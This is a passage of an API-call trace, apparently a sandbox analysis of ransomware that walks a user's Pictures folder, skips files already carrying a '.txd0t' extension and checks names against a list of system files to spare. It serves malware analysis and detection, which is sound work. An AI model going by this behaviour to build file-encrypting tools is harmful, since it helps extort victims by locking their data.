lpFileName="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1ab0 [0119.902] StrCmpW (psz1=".", psz2=".") returned 0 [0119.902] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.902] StrCmpW (psz1="..", psz2=".") returned 1 [0119.902] StrCmpW (psz1="..", psz2="..") returned 0 [0119.902] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527dccf3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x527dccf3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x528031d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.902] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.902] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.902] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.902] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.902] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt" [0119.902] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.902] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.902] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.902] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41835e50, ftCreationTime.dwHighDateTime=0x1d5e0f7, ftLastAccessTime.dwLowDateTime=0x8ec64f00, ftLastAccessTime.dwHighDateTime=0x1d5ee90, ftLastWriteTime.dwLowDateTime=0x52790b5f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1599e, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="-aUMUjkCqPRwR9Vt.gif.txd0t", cAlternateFileName="-AUMUJ~1.TXD")) returned 1 [0119.902] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif.txd0t", psz2=".") returned 1 [0119.902] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif.txd0t", psz2="..") returned 1 [0119.902] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.902] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.902] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="-aUMUjkCqPRwR9Vt.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t" [0119.903] PathFindExtensionW (pszPath="-aUMUjkCqPRwR9Vt.gif.txd0t") returned=".txd0t" [0119.903] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.903] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc6d5fd0, ftCreationTime.dwHighDateTime=0x1d5edd1, ftLastAccessTime.dwLowDateTime=0xb43a1e40, ftLastAccessTime.dwHighDateTime=0x1d5e226, ftLastWriteTime.dwLowDateTime=0x527b6b58, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0b1, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="0 jXVleh5y.bmp.txd0t", cAlternateFileName="0JXVLE~1.TXD")) returned 1 [0119.903] StrCmpW (psz1="0 jXVleh5y.bmp.txd0t", psz2=".") returned 1 [0119.903] StrCmpW (psz1="0 jXVleh5y.bmp.txd0t", psz2="..") returned 1 [0119.903] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="0 jXVleh5y.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t" [0119.903] PathFindExtensionW (pszPath="0 jXVleh5y.bmp.txd0t") returned=".txd0t" [0119.903] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.903] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8322180, ftCreationTime.dwHighDateTime=0x1d5e70a, ftLastAccessTime.dwLowDateTime=0x179c8e20, ftLastAccessTime.dwHighDateTime=0x1d5e509, ftLastWriteTime.dwLowDateTime=0x527b6b58, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe05c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="3w6B72hITb.png.txd0t", cAlternateFileName="3W6B72~1.TXD")) returned 1 [0119.903] StrCmpW (psz1="3w6B72hITb.png.txd0t", psz2=".") returned 1 [0119.903] StrCmpW (psz1="3w6B72hITb.png.txd0t", psz2="..") returned 1 [0119.903] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="3w6B72hITb.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t" [0119.903] PathFindExtensionW (pszPath="3w6B72hITb.png.txd0t") returned=".txd0t" [0119.903] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.903] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84cc6c70, ftCreationTime.dwHighDateTime=0x1d5f005, ftLastAccessTime.dwLowDateTime=0x9fe13da0, ftLastAccessTime.dwHighDateTime=0x1d5ec82, ftLastWriteTime.dwLowDateTime=0x528031d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13318, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Bn2jVBj5I1Q6.png.txd0t", cAlternateFileName="BN2JVB~1.TXD")) returned 1 [0119.903] StrCmpW (psz1="Bn2jVBj5I1Q6.png.txd0t", psz2=".") returned 1 [0119.903] StrCmpW (psz1="Bn2jVBj5I1Q6.png.txd0t", psz2="..") returned 1 [0119.903] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Bn2jVBj5I1Q6.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t" [0119.903] PathFindExtensionW (pszPath="Bn2jVBj5I1Q6.png.txd0t") returned=".txd0t" [0119.903] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.903] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a8373f0, ftCreationTime.dwHighDateTime=0x1d5e96e, ftLastAccessTime.dwLowDateTime=0x951ba230, ftLastAccessTime.dwHighDateTime=0x1d5ee9d, ftLastWriteTime.dwLowDateTime=0x528031d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1829f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="bwUCcMWGBF1Mcn_.gif.txd0t", cAlternateFileName="BWUCCM~1.TXD")) returned 1 [0119.903] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif.txd0t", psz2=".") returned 1 [0119.903] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif.txd0t", psz2="..") returned 1 [0119.903] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.903] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="bwUCcMWGBF1Mcn_.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t" [0119.903] PathFindExtensionW (pszPath="bwUCcMWGBF1Mcn_.gif.txd0t") returned=".txd0t" [0119.903] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.904] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ee86190, ftCreationTime.dwHighDateTime=0x1d5e585, ftLastAccessTime.dwLowDateTime=0x14aa8600, ftLastAccessTime.dwHighDateTime=0x1d5ec56, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8186, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", cAlternateFileName="CBMZZ5~1.TXD")) returned 1 [0119.904] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", psz2=".") returned 1 [0119.904] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", psz2="..") returned 1 [0119.904] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t" [0119.904] PathFindExtensionW (pszPath="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned=".txd0t" [0119.904] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.904] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309a2510, ftCreationTime.dwHighDateTime=0x1d5eabb, ftLastAccessTime.dwLowDateTime=0x655909d0, ftLastAccessTime.dwHighDateTime=0x1d5e9c9, ftLastWriteTime.dwLowDateTime=0x528756de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x55ff, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", cAlternateFileName="E0RUL3~1.TXD")) returned 1 [0119.904] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", psz2=".") returned 1 [0119.904] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", psz2="..") returned 1 [0119.904] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t" [0119.904] PathFindExtensionW (pszPath="e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned=".txd0t" [0119.904] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.904] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91351d40, ftCreationTime.dwHighDateTime=0x1d5e178, ftLastAccessTime.dwLowDateTime=0x3aeb9590, ftLastAccessTime.dwHighDateTime=0x1d5eb4b, ftLastWriteTime.dwLowDateTime=0x528756de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x120d8, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="EVRLdIxDOIvB-Fc9_h.gif.txd0t", cAlternateFileName="EVRLDI~1.TXD")) returned 1 [0119.904] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif.txd0t", psz2=".") returned 1 [0119.904] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif.txd0t", psz2="..") returned 1 [0119.904] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="EVRLdIxDOIvB-Fc9_h.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t" [0119.904] PathFindExtensionW (pszPath="EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned=".txd0t" [0119.904] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.904] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85808c0, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xbac47e50, ftLastAccessTime.dwHighDateTime=0x1d5e3ab, ftLastWriteTime.dwLowDateTime=0x5289b9f7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18f51, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="iRuE37I4VoTmYoZQwpA.png.txd0t", cAlternateFileName="IRUE37~1.TXD")) returned 1 [0119.904] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png.txd0t", psz2=".") returned 1 [0119.904] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png.txd0t", psz2="..") returned 1 [0119.904] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="iRuE37I4VoTmYoZQwpA.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t" [0119.904] PathFindExtensionW (pszPath="iRuE37I4VoTmYoZQwpA.png.txd0t") returned=".txd0t" [0119.904] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.904] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee270, ftCreationTime.dwHighDateTime=0x1d5efb0, ftLastAccessTime.dwLowDateTime=0x85fba70, ftLastAccessTime.dwHighDateTime=0x1d5e9ed, ftLastWriteTime.dwLowDateTime=0x5289b9f7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11f46, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Kiw0vwA10s0.png.txd0t", cAlternateFileName="KIW0VW~1.TXD")) returned 1 [0119.904] StrCmpW (psz1="Kiw0vwA10s0.png.txd0t", psz2=".") returned 1 [0119.904] StrCmpW (psz1="Kiw0vwA10s0.png.txd0t", psz2="..") returned 1 [0119.905] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.905] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.905] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Kiw0vwA10s0.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t" [0119.905] PathFindExtensionW (pszPath="Kiw0vwA10s0.png.txd0t") returned=".txd0t" [0119.905] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.905] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf35bee50, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x252c0490, ftLastAccessTime.dwHighDateTime=0x1d5e968, ftLastWriteTime.dwLowDateTime=0x528c1b40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14f19, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="O7DPIcWP9p.jpg.txd0t", cAlternateFileName="O7DPIC~1.TXD")) returned 1 [0119.905] StrCmpW (psz1="O7DPIcWP9p.jpg.txd0t", psz2=".") returned 1 [0119.905] StrCmpW (psz1="O7DPIcWP9p.jpg.txd0t", psz2="..") returned 1 [0119.905] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.905] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.905] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="O7DPIcWP9p.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t" [0119.905] PathFindExtensionW (pszPath="O7DPIcWP9p.jpg.txd0t") returned=".txd0t" [0119.905] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.905] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x640e3430, ftCreationTime.dwHighDateTime=0x1d5f075, ftLastAccessTime.dwLowDateTime=0x2dd5b5e0, ftLastAccessTime.dwHighDateTime=0x1d5e581, ftLastWriteTime.dwLowDateTime=0x528e7d69, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13891, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="qC_RZrVpYkb.bmp.txd0t", cAlternateFileName="QC_RZR~1.TXD")) returned 1 [0119.905] StrCmpW (psz1="qC_RZrVpYkb.bmp.txd0t", psz2=".") returned 1 [0119.905] StrCmpW (psz1="qC_RZrVpYkb.bmp.txd0t", psz2="..") returned 1 [0119.905] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.905] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.905] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="qC_RZrVpYkb.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t" [0119.905] PathFindExtensionW (pszPath="qC_RZrVpYkb.bmp.txd0t") returned=".txd0t" [0119.905] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.905] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: 